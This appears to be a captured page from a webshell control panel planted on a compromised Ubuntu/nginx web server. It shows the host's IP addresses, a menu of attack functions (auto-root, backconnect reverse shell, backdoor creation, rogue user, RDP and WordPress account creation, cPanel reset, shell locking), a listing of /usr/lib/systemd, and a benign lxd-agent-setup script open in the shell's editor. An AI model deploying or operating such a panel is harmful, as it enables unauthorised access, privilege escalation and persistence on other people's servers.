Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
drwxr-xr-x
journald.conf.d
[ DIR ]
drwxr-xr-x
logind.conf.d
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
repart
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-environment-generators
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-environment-generators
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
lxd-agent-setup
1.26
KB
-rwxr-xr-x
resolv.conf
710
B
-rw-r--r--
systemd
98.45
KB
-rwxr-xr-x
systemd-backlight
34.45
KB
-rwxr-xr-x
systemd-battery-check
18.45
KB
-rwxr-xr-x
systemd-binfmt
22.45
KB
-rwxr-xr-x
systemd-boot-check-no-failures
14.45
KB
-rwxr-xr-x
systemd-bsod
22.45
KB
-rwxr-xr-x
systemd-cgroups-agent
14.37
KB
-rwxr-xr-x
systemd-cryptsetup
78.95
KB
-rwxr-xr-x
systemd-executor
134.56
KB
-rwxr-xr-x
systemd-fsck
26.38
KB
-rwxr-xr-x
systemd-fsckd
26.45
KB
-rwxr-xr-x
systemd-growfs
22.45
KB
-rwxr-xr-x
systemd-hibernate-resume
22.56
KB
-rwxr-xr-x
systemd-hostnamed
46.47
KB
-rwxr-xr-x
systemd-initctl
22.45
KB
-rwxr-xr-x
systemd-integritysetup
22.52
KB
-rwxr-xr-x
systemd-journald
189.13
KB
-rwxr-xr-x
systemd-localed
54.47
KB
-rwxr-xr-x
systemd-logind
278.58
KB
-rwxr-xr-x
systemd-makefs
14.37
KB
-rwxr-xr-x
systemd-measure
46.76
KB
-rwxr-xr-x
systemd-modules-load
18.56
KB
-rwxr-xr-x
systemd-network-generator
42.45
KB
-rwxr-xr-x
systemd-networkd
1.59
MB
-rwxr-xr-x
systemd-networkd-wait-online
38.61
KB
-rwxr-xr-x
systemd-pcrextend
26.63
KB
-rwxr-xr-x
systemd-pcrlock
134.7
KB
-rwxr-xr-x
systemd-pstore
22.47
KB
-rwxr-xr-x
systemd-quotacheck
14.45
KB
-rwxr-xr-x
systemd-random-seed
26.45
KB
-rwxr-xr-x
systemd-remount-fs
18.45
KB
-rwxr-xr-x
systemd-reply-password
14.37
KB
-rwxr-xr-x
systemd-resolved
522.51
KB
-rwxr-xr-x
systemd-rfkill
22.45
KB
-rwxr-xr-x
systemd-shutdown
54.45
KB
-rwxr-xr-x
systemd-sleep
46.45
KB
-rwxr-xr-x
systemd-socket-proxyd
30.45
KB
-rwxr-xr-x
systemd-storagetm
50.59
KB
-rwxr-xr-x
systemd-sulogin-shell
18.37
KB
-rwxr-xr-x
systemd-sysctl
22.56
KB
-rwxr-xr-x
systemd-sysroot-fstab-check
54.76
KB
-rwxr-xr-x
systemd-sysupdate
114.84
KB
-rwxr-xr-x
systemd-sysv-install
1.33
KB
-rwxr-xr-x
systemd-time-wait-sync
18.37
KB
-rwxr-xr-x
systemd-timedated
42.47
KB
-rwxr-xr-x
systemd-timesyncd
58.29
KB
-rwxr-xr-x
systemd-tpm2-setup
26.56
KB
-rwxr-xr-x
systemd-udevd
1.37
MB
-rwxr-xr-x
systemd-update-done
14.37
KB
-rwxr-xr-x
systemd-update-utmp
22.45
KB
-rwxr-xr-x
systemd-user-runtime-dir
22.37
KB
-rwxr-xr-x
systemd-user-sessions
14.37
KB
-rwxr-xr-x
systemd-veritysetup
26.66
KB
-rwxr-xr-x
systemd-volatile-root
22.37
KB
-rwxr-xr-x
systemd-xdg-autostart-conditio...
14.37
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lxd-agent-setup
#!/bin/sh # # Setup script for lxd-agent that is executed by the lxd-agent systemd unit before lxd-agent is started. # The script sets up a temporary mount point, copies data from the mount (including lxd-agent binary), # and then unmounts it. It also ensures appropriate permissions for the LXD agent's runtime directory. # set -eu PREFIX="/run/lxd_agent" # Functions. mount_virtiofs() { mount -t virtiofs config "${PREFIX}/.mnt" -o ro >/dev/null 2>&1 } mount_9p() { modprobe 9pnet_virtio >/dev/null 2>&1 || true mount -t 9p config "${PREFIX}/.mnt" -o ro,access=0,trans=virtio >/dev/null 2>&1 } fail() { umount -l "${PREFIX}" >/dev/null 2>&1 || true rmdir "${PREFIX}" >/dev/null 2>&1 || true echo "${1}" exit 1 } # Setup the mount target. umount -l "${PREFIX}" >/dev/null 2>&1 || true mkdir -p "${PREFIX}" mount -t tmpfs tmpfs "${PREFIX}" -o mode=0700,nodev,nosuid,noatime,size=50M mkdir -p "${PREFIX}/.mnt" # Try virtiofs first. mount_virtiofs || mount_9p || fail "Couldn't mount virtiofs or 9p, failing." # Copy the data. cp -Ra --no-preserve=ownership "${PREFIX}/.mnt/"* "${PREFIX}" # Unmount the temporary mount. umount "${PREFIX}/.mnt" rmdir "${PREFIX}/.mnt" # Attempt to restore SELinux labels. restorecon -R "${PREFIX}" >/dev/null 2>&1 || true
Close